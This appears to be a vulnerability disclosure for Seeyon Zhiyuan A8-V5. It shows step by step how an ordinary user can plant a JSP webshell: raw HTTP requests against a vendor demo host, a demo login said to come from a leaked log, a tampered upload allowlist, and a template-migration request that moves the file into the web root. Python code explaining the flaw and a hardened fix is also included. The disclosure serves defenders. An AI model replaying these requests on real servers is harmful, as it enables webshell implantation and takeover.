### Brief description:
I have been poking at Zhiyuan A8-V5 (致远A8-V5) for the past few days. Yesterday I found a few small issues; today, digging further, I found an arbitrary file upload vulnerability.
### Details:
Zhiyuan A8-V5 collaborative management software lets an ordinary user call a function that belongs to the system-administrator role, 【Login Page Template Management】. The function cannot be opened directly in the browser (the page reports insufficient privileges), but sending the request packet directly succeeds.
A8-V5 did give real thought to the danger of uploaded files: throughout the system, uploads are cached in a directory outside the web root, so a webshell cannot be obtained directly. However, the feature in 【Login Page Template Management】 that migrates a cached file into the web directory can be used to obtain one.
### Proof of vulnerability:
Demo address:
http://a8v51.seeyon.com/
Demo account: scyd/123456, obtained from a leaked log.
Steps:
1. Use a legitimate session to obtain the template ID
2. Bypass the restriction and upload an executable .jsp file
3. Use the dynamic migration feature to move the file cached outside the web root into an arbitrary web directory
Proof:
1. Use a legitimate session to obtain the template ID
request:
```
POST /seeyon/ajax.do?method=ajaxAction&managerName=loginTemplateManager HTTP/1.0
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://a8v51.seeyon.com/seeyon/portal/loginTemplateController.do?method=loginTemplateMain&entityType=1&_resourceCode=T03_loginTemplateList
Accept-Language: zh-cn
Proxy-Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: a8v51.seeyon.com
Content-Length: 74
DNT: 1
Pragma: no-cache
Cookie: JSESSIONID=4DD87116B4082E92D03F5BB3F7F0C56F; loginPageURL="/main.do"; avatarImageUrl=8469117046183055270; Hm_lvt_49c0fa7f96aa0a5fb95c62909d5190a6=1419221849; Hm_lpvt_49c0fa7f96aa0a5fb95c62909d5190a6=1419221849

managerMethod=selectTemplateById&arguments=["2676694155142778633"]
```
response:
```
{"name":"登录页-单图片式","path":"default\/login.jsp","description":"单图片式,极简风格","updateTime":"2014-12-22 00:00","sort":"1","preset":1,"updateUser":"8469117046183055270","cdefault":0,"thumbnail":"default\/thumbnail.png","id":"2676694155142778633","new":false,"extraMap":{}}
```
Record the value of the `id` field in the response: 2676694155142778633
2. Bypass the restriction and upload an executable .jsp file
Modify the original POST request: in the `extensions` field, append `jsp` after "jpg,jpeg,gif,bmp,png", and change the `filename` from `.jpg` to `.jsp`.
The modified request:
```
POST /seeyon/fileUpload.do?method=processUpload HTTP/1.0
Accept: text/html, application/xhtml+xml, */*
Referer: http://a8v51.seeyon.com/seeyon/fileUpload.do?type=&firstSave=true&applicationCategory=1&extensions=jpg,jpeg,gif,bmp,png&quantity=1&isEncrypt=false&attachmentTrId=poi3&callMethod=uploadCallBack2&maxSize=2097152&takeOver=true&_isModalDialog=true
Accept-Language: zh-CN
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Content-Type: multipart/form-data; boundary=---------------------------7ded626340460
Proxy-Connection: Keep-Alive
Pragma: no-cache
Content-Length: 76766
DNT: 1
Host: a8v51.seeyon.com
Cookie: JSESSIONID=3385E1567ED6D100FD461F2299761286; loginPageURL="/main.do"; avatarImageUrl=-7273032013234748168; pgv_pvi=3462602752

-----------------------------7ded626340460
Content-Disposition: form-data; name="type"


-----------------------------7ded626340460
Content-Disposition: form-data; name="extensions"

jpg,jpeg,gif,bmp,png,jsp
-----------------------------7ded626340460
Content-Disposition: form-data; name="applicationCategory"

1
-----------------------------7ded626340460
Content-Disposition: form-data; name="destDirectory"


-----------------------------7ded626340460
Content-Disposition: form-data; name="destFilename"


-----------------------------7ded626340460
Content-Disposition: form-data; name="maxSize"

2097152
-----------------------------7ded626340460
Content-Disposition: form-data; name="isEncrypt"

false
-----------------------------7ded626340460
Content-Disposition: form-data; name="callMethod"

uploadCallBack2
-----------------------------7ded626340460
Content-Disposition: form-data; name="attachmentTrId"

poi3
-----------------------------7ded626340460
Content-Disposition: form-data; name="firstSave"

true
-----------------------------7ded626340460
Content-Disposition: form-data; name="takeOver"

true
-----------------------------7ded626340460
Content-Disposition: form-data; name="file1"; filename="wooyun.jsp"
Content-Type: text/plain

<%--
jsp File browser 1.2
--%>
-----------------------------7ded626340460--
```
Search the response for ".jsp":
![00.png](https://images.seebug.org/upload/201412/23101408ce158da6b12a96d463e107322602be91.png)
Record the value -4028755744185366901 from the line
```
fileurls=fileurls+","+'-4028755744185366901';
```
This is the id of the cached upload.
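Step 2 succeeds because the extension allowlist that `fileUpload.do` applies is read from the request's own `extensions` field, so whoever sends the request decides what is allowed. The Python below is an added example, not code from the product or from this report: it parses a constructed copy of the multipart body shown above, shows the client-supplied list accepting `wooyun.jsp` while a fixed server-side list rejects it, and extracts the cached-file id from a callback line of the form the response contains. The `SERVER_ALLOWLIST` mapping for `applicationCategory` 1 is an assumption made for illustration.

```python
import re

# Assumed server-side allowlist keyed by applicationCategory (category 1 is what the
# login-template upload form sends); the real product's mapping is not shown on the page.
SERVER_ALLOWLIST = {"1": {"jpg", "jpeg", "gif", "bmp", "png"}}

# Constructed copy of the step-2 multipart body (only the fields the check needs).
BOUNDARY = "---------------------------7ded626340460"
SAMPLE_BODY = "\r\n".join([
    "--" + BOUNDARY, 'Content-Disposition: form-data; name="type"', "", "",
    "--" + BOUNDARY, 'Content-Disposition: form-data; name="extensions"', "", "jpg,jpeg,gif,bmp,png,jsp",
    "--" + BOUNDARY, 'Content-Disposition: form-data; name="applicationCategory"', "", "1",
    "--" + BOUNDARY, 'Content-Disposition: form-data; name="file1"; filename="wooyun.jsp"',
    "Content-Type: text/plain", "", "<%-- jsp File browser 1.2 --%>",
    "--" + BOUNDARY + "--", "",
]).encode()

# Constructed line in the shape of the upload callback response.
SAMPLE_CALLBACK = "fileurls=fileurls+\",\"+'-4028755744185366901';"


def parse_multipart(body: bytes, boundary: str) -> dict:
    """Minimal multipart/form-data parser: {field name: (filename or None, value bytes)}."""
    fields = {}
    for part in body.split(b"--" + boundary.encode())[1:]:
        if part.startswith(b"--"):        # closing delimiter "--boundary--"
            break
        head, _, value = part.lstrip(b"\r\n").partition(b"\r\n\r\n")
        if value.endswith(b"\r\n"):       # the CRLF before the next delimiter is framing, not data
            value = value[:-2]
        name = re.search(rb'name="([^"]*)"', head)
        if not name:
            continue
        fname = re.search(rb'filename="([^"]*)"', head)
        fields[name.group(1).decode()] = (fname.group(1).decode() if fname else None, value)
    return fields


def extension_of(filename: str) -> str:
    return filename.rsplit(".", 1)[1].lower() if "." in filename else ""


def allowed_by_client_list(filename: str, extensions_field: str) -> bool:
    """The weak check: the allowlist is whatever the request's own `extensions` field says."""
    allowed = {e.strip().lower() for e in extensions_field.split(",")}
    return extension_of(filename) in allowed


def allowed_by_server_list(filename: str, application_category: str) -> bool:
    """The check that should be made: a fixed list chosen server-side for this upload context."""
    return extension_of(filename) in SERVER_ALLOWLIST.get(application_category, set())


def check_upload(body: bytes, boundary: str) -> dict:
    """Run both checks over one multipart request and report the verdicts."""
    f = parse_multipart(body, boundary)
    filename = f["file1"][0]
    return {
        "filename": filename,
        "client_check_passes": allowed_by_client_list(filename, f["extensions"][1].decode()),
        "server_check_passes": allowed_by_server_list(filename, f["applicationCategory"][1].decode()),
    }


def extract_file_id(callback_js: str):
    """Pull the cached-file id out of a `fileurls=fileurls+","+'<id>';` callback line."""
    m = re.search(r'''fileurls=fileurls\+","\+'(-?\d+)';''', callback_js)
    return m.group(1) if m else None


if __name__ == "__main__":
    print(check_upload(SAMPLE_BODY, BOUNDARY))
    print("cached file id:", extract_file_id(SAMPLE_CALLBACK))
```

The shape of the fix is `allowed_by_server_list`: the permitted extensions are looked up from the upload context on the server and never read from the request, so appending `jsp` to the form field changes nothing.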
3. Use the dynamic migration feature to move the file cached outside the web root into an arbitrary web directory
First, look at how the source code is written:
```
if ("1".equals(hotSpotType)) {
    // picFileId is taken straight from the request parameters
    String picFileId = (String)params.get("picFileId" + i);
    if ((picFileId != null) && (picFileId.trim().length() > 0)) {
        // looks up the cached upload (stored outside the web root) by its numeric id
        File uploadedFile = this.fileManager.getFile(Long.valueOf(Long.parseLong(picFileId)), new Date());
        try {
            // target = directory part of hotspotvalue + picFileId + extension of hotspotvalue;
            // hotspotvalue is also request-controlled and is neither normalised nor checked for an image extension
            String targetUrl = hotspotvalue.substring(0, hotspotvalue.lastIndexOf("/") + 1) + picFileId + hotspotvalue.substring(hotspotvalue.lastIndexOf("."), hotspotvalue.length());
            // copies the cached file under the template directory inside the web root
            FileCopyUtils.copy(uploadedFile, new File(Template_Parent_Path + targetUrl));
            this.fileSynchronization.copy(new FileInputStream(uploadedFile), "main/login/" + targetUrl);
            hotspot.setHotspotvalue(targetUrl);
        } catch (IOException e) {
            throw new BusinessException("存放图片文件出错:" + e);
        }
    }
}
```
The outcome hinges on two parameters: picFileId, which selects the cached upload, and targetUrl, which decides where it is copied to.
In this demonstration,
picFileId is the value obtained in step 2, -4028755744185366901
targetUrl =
```
String targetUrl = hotspotvalue.substring(0, hotspotvalue.lastIndexOf("/") + 1) + picFileId + hotspotvalue.substring(hotspotvalue.lastIndexOf("."), hotspotvalue.length());
```
that is, the directory part of hotspotvalue, then picFileId, then the extension of hotspotvalue.
picFileId is already known.
hotspotvalue can be set freely by the caller, and nothing checks that the resulting extension is an image type.
The customised entry is the last hotspot in the request (hotspotvalue7). If the id obtained in step 1 is different, replace the ids below with the id from step 1.
The request:
```
POST /seeyon/ajax.do?method=ajaxAction&managerName=loginTemplateManager&rnd=75321 HTTP/1.0
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://a8v51.seeyon.com/seeyon/portal/loginTemplateController.do?method=loginTemplateMain&entityType=1&_resourceCode=T03_loginTemplateList
Accept-Language: zh-cn
Proxy-Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: a8v51.seeyon.com
Content-Length: 5255
DNT: 1
Pragma: no-cache
Cookie: JSESSIONID=31BEBA9DAA457E8E8280E97175FD4DBB; loginPageURL="/main.do"; avatarImageUrl=-7273032013234748168; pgv_pvi=3462602752

managerMethod=transSaveTemplate&arguments=[{"id":"2676694155142778633","entityLevel":"system","entityId":"-1730833917365171641","name":"登录页-单图片式","description":"单图片式，极简风格","sort":"1","path":"default/login.jsp","hotSpotsCount":"8","hotSpotId0":"1186536015593226561","hotSpotType0":"0","templateId0":"2676694155142778633","hotspotkey0":"note","description0":"","entityId0":"-1730833917365171641","entityLevel0":"System","hotspotName0":"hotspot.name.note","hotspotModule0":"0","hotspotSort0":"0","hotspotRead0":"0","showdisplay0":"0","hotAccountId0":"-1730833917365171641","hotspotvalue0":"致远A8-V5协同管理软件","hotSpotId1":"-2858574230077355948","hotSpotType1":"0","templateId1":"2676694155142778633","hotspotkey1":"note","description1":"","entityId1":"-1730833917365171641","entityLevel1":"System","hotspotName1":"hotspot.name.note","hotspotModule1":"0","hotspotSort1":"0","hotspotRead1":"0","showdisplay1":"0","hotAccountId1":"-1730833917365171641","hotspotvalue1":"致远A8-V5协同管理软件","hotSpotId2":"-6590619288520733107","hotSpotType2":"1","templateId2":"2676694155142778633","hotspotkey2":"contentbgi","description2":"","entityId2":"-1730833917365171641","entityLevel2":"System,Account","hotspotName2":"hotspot.name.loginpic","hotspotModule2":"0","hotspotSort2":"1","hotspotRead2":"0","showdisplay2":"0","hotAccountId2":"-1730833917365171641","picFileId2":"","hotspotvalue2":"default/images/main_content_ie6.jpg","hotSpotId3":"-151221304857771845","hotSpotType3":"1","templateId3":"2676694155142778633","hotspotkey3":"contentbgi","description3":"","entityId3":"-1730833917365171641","entityLevel3":"System,Account","hotspotName3":"hotspot.name.loginpic","hotspotModule3":"0","hotspotSort3":"1","hotspotRead3":"0","showdisplay3":"0","hotAccountId3":"-1730833917365171641","picFileId3":"","hotspotvalue3":"default/images/main_content_ie6.jpg","hotSpotId4":"-8315917587715897900","hotSpotType4":"2","templateId4":"2676694155142778633","hotspotkey4":"mainbgc","description4":"","entityId4":"-1730833917365171641","entityLevel4":"System,Account","hotspotName4":"hotspot.name.mainbgc","hotspotModule4":"0","hotspotSort4":"2","hotspotRead4":"0","showdisplay4":"0","hotAccountId4":"-1730833917365171641","hotspotvalue4":"#fafafa","hotSpotId5":"7763739069174663407","hotSpotType5":"2","templateId5":"2676694155142778633","hotspotkey5":"mainbgc","description5":"","entityId5":"-1730833917365171641","entityLevel5":"System,Account","hotspotName5":"hotspot.name.mainbgc","hotspotModule5":"0","hotspotSort5":"2","hotspotRead5":"0","showdisplay5":"0","hotAccountId5":"-1730833917365171641","hotspotvalue5":"#fafafa","hotSpotId6":"5768369956880141892","hotSpotType6":"1","templateId6":"2676694155142778633","hotspotkey6":"mainbgi","description6":"","entityId6":"-1730833917365171641","entityLevel6":"System","hotspotName6":"hotspot.name.mainbgi","hotspotModule6":"0","hotspotSort6":"3","hotspotRead6":"0","showdisplay6":"0","hotAccountId6":"-1730833917365171641","picFileId6":"","hotspotvalue6":"default/images/main_bg.png","hotspotTiling6":"1","hotSpotId7":"-3488186128041623434","hotSpotType7":"1","templateId7":"2676694155142778633","hotspotkey7":"mainbgi","description7":"","entityId7":"-1730833917365171641","entityLevel7":"System","hotspotName7":"hotspot.name.mainbgi","hotspotModule7":"0","hotspotSort7":"3","hotspotRead7":"0","showdisplay7":"0","hotAccountId7":"-1730833917365171641","picFileId7":"-4028755744185366901","hotspotvalue7":"default/-4028755744185366901.jsp","hotspotTiling7":"1"}]
```
A `null` response means success: the cached file that was stored outside the web directory has now been migrated into the web directory.
Webshell address:
```
http://a8v51.seeyon.com/seeyon/main/login/default/-4028755744185366901.jsp
```
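The copy in transSaveTemplate is decided entirely by the request: picFileId picks the cached file, and hotspotvalue supplies both the destination directory and the extension. Because the Java shown above only slices the string, a hotspotvalue containing `../` segments would be carried into targetUrl unchanged too, which is what lets the file land in an arbitrary web directory. The Python below is an added example, not Seeyon's code: it transcribes the targetUrl expression so both inputs can be exercised, and sets beside it a hardened version with the two checks the original lacks (an image-extension allowlist and a containment check on the resolved path). `TEMPLATE_PARENT_PATH` and `IMAGE_EXTENSIONS` are assumed values; the real ones are not shown on the page.

```python
import posixpath

# Assumed location of Template_Parent_Path on the server; the real value is not shown on the page.
TEMPLATE_PARENT_PATH = "/opt/seeyon/webapps/seeyon/main/login/"
# Assumed server-side allowlist for login-template hotspot images.
IMAGE_EXTENSIONS = {".jpg", ".jpeg", ".gif", ".bmp", ".png"}


def derive_target_url(hotspotvalue: str, pic_file_id: str) -> str:
    """Python transcription of the Java expression in transSaveTemplate:

        hotspotvalue.substring(0, hotspotvalue.lastIndexOf("/") + 1)
          + picFileId
          + hotspotvalue.substring(hotspotvalue.lastIndexOf("."))

    Nothing here validates the directory part or the extension: both come
    straight from the request's hotspotvalue field.
    """
    dot = hotspotvalue.rfind(".")
    if dot < 0:
        # Java: substring(-1) throws StringIndexOutOfBoundsException
        raise ValueError("hotspotvalue has no '.' so no extension can be taken")
    slash = hotspotvalue.rfind("/")
    return hotspotvalue[:slash + 1] + pic_file_id + hotspotvalue[dot:]


def vulnerable_destination(hotspotvalue: str, pic_file_id: str) -> str:
    """Where FileCopyUtils.copy() writes: Template_Parent_Path + targetUrl, by plain string concatenation."""
    return TEMPLATE_PARENT_PATH + derive_target_url(hotspotvalue, pic_file_id)


def hardened_destination(hotspotvalue: str, pic_file_id: str, template_root: str = TEMPLATE_PARENT_PATH) -> str:
    """Same derivation, plus the two checks the original code lacks:
    the result must carry an image extension, and the resolved path must stay under template_root."""
    # Long.parseLong(picFileId) already rejects non-numeric ids; mirror that so the id cannot carry path characters
    if not pic_file_id.lstrip("-").isdigit():
        raise ValueError("picFileId must be an integer")
    target = derive_target_url(hotspotvalue, pic_file_id)
    if posixpath.splitext(target)[1].lower() not in IMAGE_EXTENSIONS:
        raise ValueError(f"extension of {target!r} is not an image type")
    root = posixpath.normpath(template_root)
    full = posixpath.normpath(posixpath.join(root, target))
    # normpath collapses '../' segments; an absolute target replaces root inside join(), so both fail this test
    if not full.startswith(root + "/"):
        raise ValueError(f"{target!r} resolves outside {root}")
    return full


if __name__ == "__main__":
    print(vulnerable_destination("default/-4028755744185366901.jsp", "-4028755744185366901"))
    for hv in ("default/images/main_bg.png", "default/shell.jsp", "../../shell.png"):
        try:
            print(hv, "->", hardened_destination(hv, "123"))
        except ValueError as e:
            print(hv, "-> rejected:", e)
```

The containment check is done on the normalised path rather than on the input string, so it is not fooled by `..` segments hidden inside otherwise plausible directory names; the extension check is applied to the computed targetUrl, which is the only string that reaches the filesystem.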
【【【【【【NOTE: it cannot be deleted】】】】】】
【【【【【【It is not that I won't delete it】】】】】】